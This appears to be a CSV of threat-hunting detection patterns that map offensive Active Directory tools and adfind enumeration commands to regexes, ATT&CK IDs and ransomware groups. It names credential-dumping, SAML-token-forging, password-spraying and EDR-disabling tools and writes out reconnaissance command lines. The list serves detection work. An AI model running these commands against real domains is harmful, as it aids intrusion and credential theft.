"*adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65*",".{0,1000}adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33391"
"*adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a*",".{0,1000}adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33392"
"*ADeleg.exe -*",".{0,1000}ADeleg\.exe\s\-.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","33393"
"*ADeleg_InsecureResourceDelegationReport_*",".{0,1000}ADeleg_InsecureResourceDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","33394"
"*ADeleg_InsecureTrusteeDelegationReport_*",".{0,1000}ADeleg_InsecureTrusteeDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","33395"
"*adexplorer.go*",".{0,1000}adexplorer\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33397"
"*ADExplorerSnapshot.py*",".{0,1000}ADExplorerSnapshot\.py.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1087.002 - T1482 - T1083 - T1003.008","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","10","10","956","126","2025-03-14T16:13:41Z","2021-12-22T14:42:23Z","33401"
"*ADExplorerSnapshot.py.git*",".{0,1000}ADExplorerSnapshot\.py\.git.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1087.002 - T1482 - T1083 - T1003.008","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","10","10","956","126","2025-03-14T16:13:41Z","2021-12-22T14:42:23Z","33402"
"*adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf*",".{0,1000}adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","33403"
"*adfind -gcb -sc trustdmp*",".{0,1000}adfind\s\-gcb\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33408"
"*adfind -sc adinfo*",".{0,1000}adfind\s\-sc\sadinfo.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33409"
"*adfind -sc computers_pwdnotreqd*",".{0,1000}adfind\s\-sc\scomputers_pwdnotreqd.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33410"
"*adfind -sc dclist*",".{0,1000}adfind\s\-sc\sdclist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33411"
"*adfind -sc dcmodes*",".{0,1000}adfind\s\-sc\sdcmodes.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33412"
"*adfind -sc domainlist*",".{0,1000}adfind\s\-sc\sdomainlist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33413"
"*adfind -sc trustdmp*",".{0,1000}adfind\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33414"
"*adfind -subnets*",".{0,1000}adfind\s\-subnets.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33416"
"*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=organizationalUnit\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33418"
"*adfind.exe -f (objectcategory=person) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=person\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33419"
"*adfind.exe -f *(objectcategory=group)* > *.txt*",".{0,1000}adfind\.exe\s\-f\s.{0,1000}\(objectcategory\=group\).{0,1000}\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33420"
"*adfind.exe -f objectcategory=computer > *.txt*",".{0,1000}adfind\.exe\s\-f\sobjectcategory\=computer\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33421"
"*adfind.exe -gcb -sc trustdmp > *.txt*",".{0,1000}adfind\.exe\s\-gcb\s\-sc\strustdmp\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33423"
"*AdFind.exe -sc getacls -sddlfilter   *computer* -recmute*",".{0,1000}AdFind\.exe\s\-sc\sgetacls\s\-sddlfilter\s\s\s.{0,1000}computer.{0,1000}\s\s\-recmute.{0,1000}","offensive_tool_keyword","noPac","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","33424"
"*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*",".{0,1000}adfind\.exe\s\-subnets\s\-f\s\(objectCategory\=subnet\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33426"
"*ADFSDump.csproj*",".{0,1000}ADFSDump\.csproj.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","33430"
"*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","33431"
"*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ADFSDump","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33432"
"*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","33433"
"*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33434"
"*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33435"
"*ADFSDump.sln*",".{0,1000}ADFSDump\.sln.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","33436"
"*ADFSpoof.py*",".{0,1000}ADFSpoof\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","33437"
"*ADFSpoof-master*",".{0,1000}ADFSpoof\-master.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","33438"
"*ADFSpray.csv*",".{0,1000}ADFSpray\.csv.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","33439"
"*adfspray.git*",".{0,1000}adfspray\.git.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","33440"
"*ADFSpray.py*",".{0,1000}ADFSpray\.py.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","33441"
"*ADFSRelay -*",".{0,1000}ADFSRelay\s\-.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","33442"
"*ADFSRelay-main*",".{0,1000}ADFSRelay\-main.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","33443"
"*ADHunt-main.zip*",".{0,1000}ADHunt\-main\.zip.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","33444"
"*adidnsdump -u *",".{0,1000}adidnsdump\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33445"
"*adidnsdump*",".{0,1000}adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","33446"
"*ad-ldap-enum.py*",".{0,1000}ad\-ldap\-enum\.py.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","33449"
"*ad-ldap-enum-main*",".{0,1000}ad\-ldap\-enum\-main.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","33450"
"*adm|admin|root|sudo|wheel*",".{0,1000}adm\|admin\|root\|sudo\|wheel.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","33451"
"*adm1nPanda/SharpExfil*",".{0,1000}adm1nPanda\/SharpExfil.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","1","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","33452"
"*ADMIN$\\System32\\CodeIntegrity\\SiPolicy.p7b*",".{0,1000}ADMIN\$\\\\System32\\\\CodeIntegrity\\\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","33453"
